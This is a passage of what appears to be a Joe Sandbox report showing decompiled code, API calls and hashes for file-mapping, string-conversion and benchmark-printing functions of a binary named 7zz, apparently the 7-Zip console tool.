                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 772e87da75b6b7c62898645b4c777575a3ccfa1faee4ffe1159f4fb115bb9a44
                                                                                  • Instruction ID: c9cb9fdb4045278a2449ae7dde7cf1f47b93b7590a933fb60e95c99ee0c0d7ef
                                                                                  • Opcode Fuzzy Hash: 772e87da75b6b7c62898645b4c777575a3ccfa1faee4ffe1159f4fb115bb9a44
                                                                                  • Instruction Fuzzy Hash: 4A11E97E270D0647A75C876DAC336B921C1E784309798A13DE54BCA3C2EF6EC896C648
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00410DFA Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 183fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00410DFA(intOrPtr __ecx, void* __edx) {
				void* _t63;
				void* _t68;
				void* _t75;
				long _t76;
				void* _t83;
				void* _t90;
				void* _t134;
				void* _t135;
				long _t142;
				signed int _t144;
				void* _t145;
				void* _t147;
				void* _t149;

				L0046B890(E00474220, _t147);
				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x58;
				_t134 = __edx;
				 *((intOrPtr*)(_t147 - 0x20)) = __ecx;
				_t63 = E00411BA8(__edx, 0x3a, 0);
				_t138 = _t63;
				if(_t63 < 0) {
					L0040FFF2();
				}
				L00407399(_t134, _t147 - 0x64, _t138);
				 *(_t147 - 4) = 0;
				L004072C9(_t134, _t147 - 0x40, _t138 + 1);
				 *(_t147 - 4) = 1;
				_t68 = E00411BA8(_t147 - 0x40, 0x3a, 0);
				_t140 = _t68;
				if(_t68 < 0) {
					L0040FFF2();
				}
				L00407399(_t147 - 0x40, _t147 - 0x58, _t140);
				 *(_t147 - 4) = 2;
				L004072C9(_t147 - 0x40, _t147 - 0x4c, _t140 + 1);
				 *(_t147 - 4) = 3;
				_t142 = E004082A1( *((intOrPtr*)(_t147 - 0x58)), 0);
				 *(_t147 - 0x24) = 0;
				 *(_t147 - 0x18) = 0;
				_t131 = _t147 - 0x64;
				 *(_t147 - 4) = 4;
				_t75 = OpenFileMappingA(4, 0,  *(L0041AE3F()));
				 *(_t147 - 0x18) = _t75;
				if(_t75 == 0) {
					_t76 = GetLastError();
				} else {
					_t76 = 0;
				}
				 *((char*)(_t147 - 0x11)) = _t76 != 0;
				L00407A18( *((intOrPtr*)(_t147 - 0x34)));
				if( *((intOrPtr*)(_t147 - 0x11)) != 0) {
					L0040FFFD("Can not open mapping");
				}
				_t135 = MapViewOfFile( *(_t147 - 0x18), 4, 0, 0, _t142);
				 *(_t147 - 0x24) = _t135;
				if(_t135 == 0) {
					L0040FFFD("MapViewOfFile error");
				}
				 *(_t147 - 4) = 5;
				if( *_t135 != 0) {
					L0040FFFD("Incorrect mapping data");
				}
				 *(_t147 - 0x1c) = _t142 >> 1;
				 *((intOrPtr*)(_t147 - 0x34)) = 0;
				 *(_t147 - 0x30) = 0;
				 *((intOrPtr*)(_t147 - 0x2c)) = 0;
				E00401E9A(_t147 - 0x34, 3);
				 *(_t147 - 4) = 6;
				_t144 = 1;
				while(_t144 <  *(_t147 - 0x1c)) {
					_t94 =  *((intOrPtr*)(_t135 + _t144 * 2));
					if( *((intOrPtr*)(_t135 + _t144 * 2)) != 0) {
						E004054FE(_t147 - 0x34, _t131, __eflags, _t94);
					} else {
						_t131 = _t147 - 0x34;
						E00410AC9( *((intOrPtr*)(_t147 - 0x20)), _t147 - 0x34,  *((intOrPtr*)(_t147 + 8)),  *(_t147 + 0xc));
						 *(_t147 - 0x30) = 0;
						 *((short*)( *((intOrPtr*)(_t147 - 0x34)))) = 0;
					}
					_t144 = _t144 + 1;
				}
				__eflags =  *(_t147 - 0x30);
				if( *(_t147 - 0x30) != 0) {
					L0040FFFD("data error");
				}
				L00407A18( *((intOrPtr*)(_t147 - 0x34)));
				 *(_t147 - 4) = 4;
				UnmapViewOfFile(_t135);
				__eflags =  *(_t147 - 0x18);
				if( *(_t147 - 0x18) != 0) {
					CloseHandle( *(_t147 - 0x18));
				}
				 *(_t147 + 0xc) = 0;
				 *(_t147 - 4) = 8;
				_t83 = OpenEventA(2, 0,  *(L0041AE3F()));
				__eflags = _t83;
				 *(_t147 + 0xc) = _t83;
				if(_t83 == 0) {
					_t145 = GetLastError();
				} else {
					_t145 = 0;
				}
				L00407A18( *((intOrPtr*)(_t147 - 0x34)));
				__eflags = _t145;
				if(_t145 == 0) {
					L00467B10(_t147 + 0xc);
				}
				L00467A90(_t147 + 0xc);
				L00407A18( *((intOrPtr*)(_t147 - 0x4c)));
				L00407A18( *((intOrPtr*)(_t147 - 0x58)));
				L00407A18( *((intOrPtr*)(_t147 - 0x40)));
				_t90 = L00407A18( *((intOrPtr*)(_t147 - 0x64)));
				 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
				return _t90;
			}
















                                                                                  0x00410dff
                                                                                  0x00410e0c
                                                                                  0x00410e0f
                                                                                  0x00410e11
                                                                                  0x00410e19
                                                                                  0x00410e1e
                                                                                  0x00410e22
                                                                                  0x00410e24
                                                                                  0x00410e24
                                                                                  0x00410e30
                                                                                  0x00410e3d
                                                                                  0x00410e40
                                                                                  0x00410e4b
                                                                                  0x00410e4f
                                                                                  0x00410e54
                                                                                  0x00410e58
                                                                                  0x00410e5a
                                                                                  0x00410e5a
                                                                                  0x00410e67
                                                                                  0x00410e75
                                                                                  0x00410e79
                                                                                  0x00410e83
                                                                                  0x00410e8c
                                                                                  0x00410e8e
                                                                                  0x00410e91
                                                                                  0x00410e94
                                                                                  0x00410e9a
                                                                                  0x00410ea8
                                                                                  0x00410eb0
                                                                                  0x00410eb3
                                                                                  0x00410eb9
                                                                                  0x00410eb5
                                                                                  0x00410eb5
                                                                                  0x00410eb5
                                                                                  0x00410ec4
                                                                                  0x00410ec8
                                                                                  0x00410ed1
                                                                                  0x00410ed8
                                                                                  0x00410ed8
                                                                                  0x00410eeb
                                                                                  0x00410eef
                                                                                  0x00410ef2
                                                                                  0x00410ef9
                                                                                  0x00410ef9
                                                                                  0x00410f01
                                                                                  0x00410f05
                                                                                  0x00410f0c
                                                                                  0x00410f0c
                                                                                  0x00410f18
                                                                                  0x00410f1b
                                                                                  0x00410f1e
                                                                                  0x00410f21
                                                                                  0x00410f24
                                                                                  0x00410f2b
                                                                                  0x00410f2f
                                                                                  0x00410f30
                                                                                  0x00410f35
                                                                                  0x00410f3c
                                                                                  0x00410f5e
                                                                                  0x00410f3e
                                                                                  0x00410f44
                                                                                  0x00410f4a
                                                                                  0x00410f52
                                                                                  0x00410f55
                                                                                  0x00410f55
                                                                                  0x00410f63
                                                                                  0x00410f63
                                                                                  0x00410f66
                                                                                  0x00410f69
                                                                                  0x00410f70
                                                                                  0x00410f70
                                                                                  0x00410f78
                                                                                  0x00410f7e
                                                                                  0x00410f86
                                                                                  0x00410f8c
                                                                                  0x00410f8f
                                                                                  0x00410f94
                                                                                  0x00410f94
                                                                                  0x00410f9a
                                                                                  0x00410fa3
                                                                                  0x00410fb1
                                                                                  0x00410fb7
                                                                                  0x00410fb9
                                                                                  0x00410fbc
                                                                                  0x00410fc8
                                                                                  0x00410fbe
                                                                                  0x00410fbe
                                                                                  0x00410fbe
                                                                                  0x00410fcd
                                                                                  0x00410fd2
                                                                                  0x00410fd5
                                                                                  0x00410fda
                                                                                  0x00410fda
                                                                                  0x00410fe2
                                                                                  0x00410fea
                                                                                  0x00410ff2
                                                                                  0x00410ffa
                                                                                  0x00411002
                                                                                  0x0041100d
                                                                                  0x00411018

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00410DFF
                                                                                  • OpenFileMappingA.KERNEL32 ref: 00410EA8
                                                                                  • GetLastError.KERNEL32 ref: 00410EB9
                                                                                  • MapViewOfFile.KERNEL32(00000002,00000004,00000000,00000000,00000000,?), ref: 00410EE5
                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00000003), ref: 00410F86
                                                                                  • CloseHandle.KERNEL32(00000002), ref: 00410F94
                                                                                  • OpenEventA.KERNEL32(00000002,00000000,00000000), ref: 00410FB1
                                                                                  • GetLastError.KERNEL32 ref: 00410FC2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$ErrorLastOpenView$CloseEventH_prologHandleMappingUnmap
                                                                                  • String ID: Can not open mapping$Incorrect mapping data$MapViewOfFile error$data error
                                                                                  • API String ID: 3506968402-3547812707
                                                                                  • Opcode ID: 536fedebb275c513b52617318d66a2509922886c477389a5a80e1095ca8b336e
                                                                                  • Instruction ID: 429b42cc52d2415495e97970ec32bea979b2661ba41aff62b748449d2bc5275c
                                                                                  • Opcode Fuzzy Hash: 536fedebb275c513b52617318d66a2509922886c477389a5a80e1095ca8b336e
                                                                                  • Instruction Fuzzy Hash: 4E618C30D01219AEDB11EFA6D882AEDBB75EF44308F10443EF505B7291DB781E85DB9A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00472126 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 61%
                                                                                  			E00472126(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, char _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x47cd28);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x4938a0; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0047234A(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x4938a0; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x493880; // 0x0
								_a28 = _t82;
							}
							_t16 =  &_a32; // 0x496224
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~( *_t16) & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E0046CC80(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E0046CC80(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x47cd24, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x47cd20, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x4938a0 = 2;
							goto L5;
						}
					} else {
						 *0x4938a0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}























                                                                                  0x00472129
                                                                                  0x0047212b
                                                                                  0x00472130
                                                                                  0x0047213b
                                                                                  0x0047213c
                                                                                  0x00472143
                                                                                  0x00472149
                                                                                  0x0047214e
                                                                                  0x00472154
                                                                                  0x0047219c
                                                                                  0x0047219f
                                                                                  0x004721a7
                                                                                  0x004721ad
                                                                                  0x004721ae
                                                                                  0x004721ae
                                                                                  0x004721b1
                                                                                  0x004721b9
                                                                                  0x004721db
                                                                                  0x00000000
                                                                                  0x004721e1
                                                                                  0x004721e4
                                                                                  0x004721e6
                                                                                  0x004721eb
                                                                                  0x004721eb
                                                                                  0x004721f6
                                                                                  0x004721fb
                                                                                  0x0047220b
                                                                                  0x0047220d
                                                                                  0x00472212
                                                                                  0x00000000
                                                                                  0x00472218
                                                                                  0x00472218
                                                                                  0x00472223
                                                                                  0x00472228
                                                                                  0x0047222d
                                                                                  0x00472230
                                                                                  0x0047224c
                                                                                  0x00000000
                                                                                  0x00472267
                                                                                  0x00472279
                                                                                  0x0047227b
                                                                                  0x00472280
                                                                                  0x00000000
                                                                                  0x00472282
                                                                                  0x00472286
                                                                                  0x004722c8
                                                                                  0x004722d7
                                                                                  0x004722dc
                                                                                  0x004722df
                                                                                  0x004722e1
                                                                                  0x004722e4
                                                                                  0x004722fe
                                                                                  0x00000000
                                                                                  0x00472318
                                                                                  0x0047231b
                                                                                  0x0047231c
                                                                                  0x0047231d
                                                                                  0x00472323
                                                                                  0x00472326
                                                                                  0x0047231f
                                                                                  0x0047231f
                                                                                  0x00472320
                                                                                  0x00472320
                                                                                  0x00472339
                                                                                  0x0047233d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0047233d
                                                                                  0x00472288
                                                                                  0x0047228b
                                                                                  0x00472343
                                                                                  0x00472343
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0047228b
                                                                                  0x00472286
                                                                                  0x00472280
                                                                                  0x0047224c
                                                                                  0x00472212
                                                                                  0x004721bb
                                                                                  0x004721cd
                                                                                  0x004721cd
                                                                                  0x00472156
                                                                                  0x00472156
                                                                                  0x00472157
                                                                                  0x0047215a
                                                                                  0x00472170
                                                                                  0x0047218c
                                                                                  0x004722b4
                                                                                  0x004722b4
                                                                                  0x00472192
                                                                                  0x00472192
                                                                                  0x00000000
                                                                                  0x00472192
                                                                                  0x00472172
                                                                                  0x00472172
                                                                                  0x00000000
                                                                                  0x00472172
                                                                                  0x00472170
                                                                                  0x004722bc
                                                                                  0x004722c7

                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,0047CD24,00000001,00000000,00000000,74CB70F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 00472168
                                                                                  • LCMapStringA.KERNEL32(00000000,00000100,0047CD20,00000001,00000000,00000000,?,?,00471FC7,?,?,?,00000000,00000001), ref: 00472184
                                                                                  • LCMapStringA.KERNEL32(?,?,?,00471FC7,?,?,74CB70F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 004721CD
                                                                                  • MultiByteToWideChar.KERNEL32(?,$bI,?,00471FC7,00000000,00000000,74CB70F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 00472205
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00471FC7,?,00000000,?,?,00471FC7,?), ref: 0047225D
                                                                                  • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00471FC7,?), ref: 00472273
                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00471FC7,?), ref: 004722A6
                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00471FC7,?), ref: 0047230E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide
                                                                                  • String ID: $bI
                                                                                  • API String ID: 352835431-2563688255
                                                                                  • Opcode ID: 613b29bf82b8a870d737d70060f132928fb253a9dec2a6d6ec0a899db9a9147f
                                                                                  • Instruction ID: 5ffb5e9b6ab65bc4ab37f18ce6ac32945fb5d904f638d9a0d25ac77dd211bcbc
                                                                                  • Opcode Fuzzy Hash: 613b29bf82b8a870d737d70060f132928fb253a9dec2a6d6ec0a899db9a9147f
                                                                                  • Instruction Fuzzy Hash: F051A031500249EFCF228F94CD85AEF7FB5FB49754F20816AF918A1260D3798D60DBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401679 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 185COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 33%
                                                                                  			E00401679(void* __ecx, signed int __edx, void* __eflags) {
				void* _t56;
				signed int _t63;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				void* _t75;
				void* _t76;
				signed int _t80;
				signed int _t83;
				void* _t85;
				void* _t90;
				void* _t105;
				void* _t111;
				signed int _t114;
				char* _t115;
				intOrPtr _t117;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t126;
				signed int* _t127;
				signed int* _t129;
				signed int _t130;
				signed int* _t131;
				void* _t132;
				void* _t134;
				char** _t135;

				_t114 = __edx;
				L0046B890(0x472cf8, _t132);
				_t135 = _t134 - 0x28;
				 *(_t132 - 0x1c) = __edx;
				_t90 = __ecx;
				if(E00414B6B(__eflags) != 0) {
					_t56 = E0040C609();
					 *(_t132 - 0x28) = _t114;
					_t126 = E0040C5F4();
					_t115 = "size: ";
					_push(_t126);
					_push("CPU hardware threads:");
					E00401631(_t90, _t56,  *(_t132 - 0x28));
					__eflags =  *(_t132 + 8) - 0xffffffff;
					if( *(_t132 + 8) == 0xffffffff) {
						 *(_t132 + 8) = _t126;
					}
					__eflags =  *((intOrPtr*)(_t132 + 0xc)) - 0xffffffff;
					if( *((intOrPtr*)(_t132 + 0xc)) == 0xffffffff) {
						 *((intOrPtr*)(_t132 + 0xc)) = 0x1000000;
					}
					_t120 =  *(_t132 + 8);
					_push(_t120 << 3);
					_t127 = L004079F2();
					 *(_t132 - 0x14) = _t127;
					 *(_t132 - 0x24) = _t127;
					 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
					 *_t135 = "\n\nSize";
					_push(_t90);
					L0046B47B();
					_t63 = 0;
					__eflags = _t120;
					if(_t120 > 0) {
						do {
							_t13 = _t63 + 1; // 0x1
							_t124 = _t13;
							L0046B47B(_t90, " %5d", _t124);
							 *_t127 =  *_t127 & 0x00000000;
							_t127[1] = _t127[1] & 0x00000000;
							_t63 = _t124;
							_t135 =  &(_t135[3]);
							_t127 =  &(_t127[2]);
							__eflags = _t63 -  *(_t132 + 8);
						} while (_t63 <  *(_t132 + 8));
					}
					_push("\n\n");
					_push(_t90);
					L0046B47B();
					__eflags =  *(_t132 - 0x1c);
					 *(_t132 - 0x2c) = 0;
					 *(_t132 - 0x28) = 0;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					if( *(_t132 - 0x1c) <= 0) {
						L23:
						L00407A18( *(_t132 - 0x14));
						_t67 = 0;
						__eflags = 0;
					} else {
						do {
							 *(_t132 - 0x10) = 0xa;
							while(1) {
								_t100 =  *(_t132 - 0x10);
								_t68 = 1;
								_t69 = _t68 <<  *(_t132 - 0x10);
								__eflags = _t69 -  *((intOrPtr*)(_t132 + 0xc));
								 *(_t132 - 0x20) = _t69;
								if(_t69 >  *((intOrPtr*)(_t132 + 0xc))) {
									goto L17;
								}
								L0046B47B(_t90, "%2d: ", _t100);
								_t122 = 0;
								_t135 =  &(_t135[3]);
								__eflags =  *(_t132 + 8);
								if( *(_t132 + 8) <= 0) {
									L16:
									_push("\n");
									_push(_t90);
									L0046B47B();
									 *(_t132 - 0x2c) =  *(_t132 - 0x2c) + 1;
									asm("adc dword [ebp-0x28], 0x0");
									 *(_t132 - 0x10) =  *(_t132 - 0x10) + 1;
									__eflags =  *(_t132 - 0x10) - 0x20;
									if( *(_t132 - 0x10) < 0x20) {
										continue;
									} else {
										goto L17;
									}
								} else {
									_t129 =  *(_t132 - 0x14);
									while(1) {
										_t80 = E00401896();
										__eflags = _t80;
										if(_t80 != 0) {
											break;
										}
										_t122 = _t122 + 1;
										_push(_t132 - 0x34);
										_t83 = E00414C98(_t122,  *(_t132 - 0x20));
										__eflags = _t83;
										if(_t83 != 0) {
											_t130 = _t83;
											L27:
											L00407A18( *(_t132 - 0x14));
											_t67 = _t130;
										} else {
											_t117 =  *((intOrPtr*)(_t132 - 0x30));
											_t111 = 0x14;
											_t85 = L0046B2E0( *((intOrPtr*)(_t132 - 0x34)), _t111, _t117);
											_push(_t117);
											_push(_t85);
											_t115 = 5;
											E00401134(_t90, _t115, __eflags);
											 *_t129 =  *_t129 +  *((intOrPtr*)(_t132 - 0x34));
											asm("adc [esi+0x4], ecx");
											_t129 =  &(_t129[2]);
											__eflags = _t122 -  *(_t132 + 8);
											if(_t122 <  *(_t132 + 8)) {
												continue;
											} else {
												goto L16;
											}
										}
										goto L24;
									}
									_t130 = 0x80004004;
									goto L27;
								}
								goto L24;
							}
							L17:
							 *((intOrPtr*)(_t132 - 0x18)) =  *((intOrPtr*)(_t132 - 0x18)) + 1;
							__eflags =  *((intOrPtr*)(_t132 - 0x18)) -  *(_t132 - 0x1c);
						} while ( *((intOrPtr*)(_t132 - 0x18)) <  *(_t132 - 0x1c));
						__eflags =  *(_t132 - 0x2c) |  *(_t132 - 0x28);
						if(( *(_t132 - 0x2c) |  *(_t132 - 0x28)) != 0) {
							_push("\nAvg:");
							_push(_t90);
							L0046B47B();
							_t123 =  *(_t132 + 8);
							__eflags = _t123;
							if(_t123 > 0) {
								_t131 =  *(_t132 - 0x14);
								do {
									_t75 = L0046B300( *_t131, _t131[1],  *(_t132 - 0x2c),  *(_t132 - 0x28));
									_t105 = 0x14;
									_t76 = L0046B2E0(_t75, _t105, _t115);
									_push(_t115);
									_push(_t76);
									_t115 = 5;
									E00401134(_t90, _t115, __eflags);
									_t131 =  &(_t131[2]);
									_t123 = _t123 - 1;
									__eflags = _t123;
								} while (_t123 != 0);
							}
							_push("\n");
							_push(_t90);
							L0046B47B();
						}
						goto L23;
					}
				} else {
					_t67 = 1;
				}
				L24:
				 *[fs:0x0] =  *((intOrPtr*)(_t132 - 0xc));
				return _t67;
			}































                                                                                  0x00401679
                                                                                  0x0040167e
                                                                                  0x00401683
                                                                                  0x00401689
                                                                                  0x0040168c
                                                                                  0x00401695
                                                                                  0x0040169f
                                                                                  0x004016a6
                                                                                  0x004016ae
                                                                                  0x004016b0
                                                                                  0x004016b5
                                                                                  0x004016b6
                                                                                  0x004016c1
                                                                                  0x004016c6
                                                                                  0x004016ca
                                                                                  0x004016cc
                                                                                  0x004016cc
                                                                                  0x004016cf
                                                                                  0x004016d3
                                                                                  0x004016d5
                                                                                  0x004016d5
                                                                                  0x004016dc
                                                                                  0x004016e4
                                                                                  0x004016ea
                                                                                  0x004016ec
                                                                                  0x004016ef
                                                                                  0x004016f2
                                                                                  0x004016f6
                                                                                  0x004016fd
                                                                                  0x004016fe
                                                                                  0x00401704
                                                                                  0x00401706
                                                                                  0x00401709
                                                                                  0x0040170b
                                                                                  0x0040170b
                                                                                  0x0040170b
                                                                                  0x00401715
                                                                                  0x0040171a
                                                                                  0x0040171d
                                                                                  0x00401721
                                                                                  0x00401723
                                                                                  0x00401726
                                                                                  0x00401729
                                                                                  0x00401729
                                                                                  0x0040170b
                                                                                  0x0040172e
                                                                                  0x00401733
                                                                                  0x00401734
                                                                                  0x0040173c
                                                                                  0x00401740
                                                                                  0x00401743
                                                                                  0x00401746
                                                                                  0x00401749
                                                                                  0x0040185b
                                                                                  0x0040185e
                                                                                  0x00401864
                                                                                  0x00401864
                                                                                  0x0040174f
                                                                                  0x0040174f
                                                                                  0x0040174f
                                                                                  0x00401756
                                                                                  0x00401756
                                                                                  0x0040175b
                                                                                  0x0040175c
                                                                                  0x0040175e
                                                                                  0x00401761
                                                                                  0x00401764
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401771
                                                                                  0x00401776
                                                                                  0x00401778
                                                                                  0x0040177b
                                                                                  0x0040177e
                                                                                  0x004017d4
                                                                                  0x004017d4
                                                                                  0x004017d9
                                                                                  0x004017da
                                                                                  0x004017df
                                                                                  0x004017e5
                                                                                  0x004017e9
                                                                                  0x004017ec
                                                                                  0x004017f0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401780
                                                                                  0x00401780
                                                                                  0x00401783
                                                                                  0x00401783
                                                                                  0x00401788
                                                                                  0x0040178a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401793
                                                                                  0x00401799
                                                                                  0x0040179a
                                                                                  0x0040179f
                                                                                  0x004017a1
                                                                                  0x0040187e
                                                                                  0x00401880
                                                                                  0x00401883
                                                                                  0x00401889
                                                                                  0x004017a7
                                                                                  0x004017aa
                                                                                  0x004017af
                                                                                  0x004017b0
                                                                                  0x004017b7
                                                                                  0x004017b8
                                                                                  0x004017bb
                                                                                  0x004017bc
                                                                                  0x004017c7
                                                                                  0x004017c9
                                                                                  0x004017cc
                                                                                  0x004017cf
                                                                                  0x004017d2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004017d2
                                                                                  0x00000000
                                                                                  0x004017a1
                                                                                  0x00401877
                                                                                  0x00000000
                                                                                  0x00401877
                                                                                  0x00000000
                                                                                  0x0040177e
                                                                                  0x004017f6
                                                                                  0x004017f6
                                                                                  0x004017fc
                                                                                  0x004017fc
                                                                                  0x00401808
                                                                                  0x0040180b
                                                                                  0x0040180d
                                                                                  0x00401812
                                                                                  0x00401813
                                                                                  0x00401818
                                                                                  0x0040181c
                                                                                  0x0040181f
                                                                                  0x00401821
